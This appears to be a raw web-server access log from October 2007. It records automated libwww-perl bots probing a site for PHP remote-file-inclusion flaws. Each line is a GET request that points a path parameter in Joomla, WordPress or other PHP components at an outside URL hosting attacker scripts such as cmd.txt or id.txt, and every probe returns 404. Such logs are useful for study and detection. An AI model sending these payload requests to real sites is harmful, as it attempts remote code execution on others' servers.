213.194.124.84 - - [21/Oct/2007:17:00:12 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:17:00:26 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:17:00:27 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:17:00:28 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:17:00:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:17:00:51 -0700] "GET /logs/access_071008.log//index.php?loc=start&page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:17:00:51 -0700] "GET //index.php?loc=start&page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:17:00:51 -0700] "GET /logs//index.php?loc=start&page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:01:12 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:01:16 -0700] "GET /logs/access_070910.log/includes/dbal.php?eqdkp_root_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:01:19 -0700] "GET /includes/dbal.php?eqdkp_root_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:01:27 -0700] "GET /logs/access_070820.log/includes/dbal.php?eqdkp_root_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.181.5 - - [21/Oct/2007:17:01:53 -0700] "GET /logs/access_070730.log/index.php?x=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
65.199.90.37 - - [21/Oct/2007:17:01:55 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.3002.net/gallery/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.199.90.37 - - [21/Oct/2007:17:01:55 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.3002.net/gallery/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.67.5.113 - - [21/Oct/2007:17:02:15 -0700] "GET /logs//billing/header.php/step_one.php?server_inc=http://www.freewebtown.com/w8ting4ustrings/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.67.5.113 - - [21/Oct/2007:17:02:15 -0700] "GET //billing/header.php/step_one.php?server_inc=http://www.freewebtown.com/w8ting4ustrings/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.171.31.19 - - [21/Oct/2007:17:02:31 -0700] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.171.31.19 - - [21/Oct/2007:17:02:32 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.171.31.19 - - [21/Oct/2007:17:02:32 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:17:02:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:17:02:36 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:02:40 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:02:42 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:02:44 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.171.31.19 - - [21/Oct/2007:17:02:49 -0700] "GET /logs/access_070924.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.54.72.151 - - [21/Oct/2007:17:03:07 -0700] "GET /logs/access_070826.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:03:09 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:03:09 -0700] "GET //components/com_minibb.php?absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:03:19 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:03:19 -0700] "GET //components/com_minibb.php?absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:03:39 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:03:39 -0700] "GET //components/com_minibb.php?absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:04:03 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:04:03 -0700] "GET //components/com_minibb.php?absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.192.85.39 - - [21/Oct/2007:17:04:54 -0700] "GET /logs/access_070826.log/inc.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.192.85.39 - - [21/Oct/2007:17:04:54 -0700] "GET /inc.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.192.85.39 - - [21/Oct/2007:17:04:55 -0700] "GET /logs/inc.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:04:59 -0700] "GET /logs/access_070618.log/wordtube/wordtube-button.php?wpPATH=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:05:01 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:05:03 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:05:23 -0700] "GET /logs/includes/dbal.php?eqdkp_root_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:05:28 -0700] "GET /includes/dbal.php?eqdkp_root_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:05:37 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:05:37 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:05:37 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
91.197.136.40 - - [21/Oct/2007:17:05:38 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:05:39 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:05:39 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:05:44 -0700] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:05:44 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:05:45 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:05:47 -0700] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
91.197.136.40 - - [21/Oct/2007:17:05:47 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:05:48 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.44.250 - - [21/Oct/2007:17:05:56 -0700] "GET /logs/access_070826.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:06:08 -0700] "GET /logs/includes/dbal.php?eqdkp_root_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:17:06:08 -0700] "GET /includes/dbal.php?eqdkp_root_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:06:20 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:06:20 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:06:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:06:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [21/Oct/2007:17:06:20 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [21/Oct/2007:17:06:20 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:06:26 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:06:26 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:06:26 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:06:26 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:06:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.203.42 - - [21/Oct/2007:17:06:27 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.83.2.40 - - [21/Oct/2007:17:06:30 -0700] "GET /logs/access_070826.log/main.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.83.2.40 - - [21/Oct/2007:17:06:30 -0700] "GET /main.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.83.2.40 - - [21/Oct/2007:17:06:31 -0700] "GET /logs/main.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:06:51 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:06:53 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:07:01 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:17:07:03 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:07:30 -0700] "GET /logs/access_070924.log/wordtube/wordtube-button.php?wpPATH=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:07:51 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:07:51 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:07:52 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:07:52 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:07:52 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:07:53 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.83.2.40 - - [21/Oct/2007:17:08:47 -0700] "GET /logs/access_070826.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.103.67 - - [21/Oct/2007:17:08:49 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/wiz84wiz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.103.67 - - [21/Oct/2007:17:08:49 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/wiz84wiz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:08:58 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.28 - - [21/Oct/2007:17:08:58 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.188.64 - - [21/Oct/2007:17:08:59 -0700] "GET /logs/access_070723.log/middle.php?page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.172.188.64 - - [21/Oct/2007:17:08:59 -0700] "GET /middle.php?page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.172.188.64 - - [21/Oct/2007:17:08:59 -0700] "GET /logs/middle.php?page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:09:02 -0700] "GET /logs/access_070730.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:09:02 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:09:03 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.191.155 - - [21/Oct/2007:17:09:03 -0700] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.187.100.101 - - [21/Oct/2007:17:09:23 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:09:23 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:09:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:09:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:09:24 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:09:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:09:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:09:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
204.187.100.101 - - [21/Oct/2007:17:09:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:09:38 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:09:38 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:09:38 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.171.255.102 - - [21/Oct/2007:17:09:51 -0700] "GET /logs//ws/login.php?noSet=0&includedir=http://www.benspoetter.com//contenido/cronjobs/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.171.255.102 - - [21/Oct/2007:17:09:51 -0700] "GET //ws/login.php?noSet=0&includedir=http://www.benspoetter.com//contenido/cronjobs/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.67.5.113 - - [21/Oct/2007:17:10:09 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/w8ting4ustrings/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.67.5.113 - - [21/Oct/2007:17:10:10 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/w8ting4ustrings/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.62.35.165 - - [21/Oct/2007:17:10:17 -0700] "GET /logs/access_071001.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [21/Oct/2007:17:10:17 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.62.35.165 - - [21/Oct/2007:17:10:18 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.218.137.34 - - [21/Oct/2007:17:10:30 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.218.137.34 - - [21/Oct/2007:17:10:30 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.119.183.5 - - [21/Oct/2007:17:10:31 -0700] "GET /logs/access_070826.log/index.php?p=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.205.60.84 - - [21/Oct/2007:17:10:47 -0700] "GET /logs/access_070826.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:10:51 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:10:52 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.220.74 - - [21/Oct/2007:17:11:25 -0700] "GET /logs/access_070826.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.239.220.74 - - [21/Oct/2007:17:11:25 -0700] "GET /logs/access_070826.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
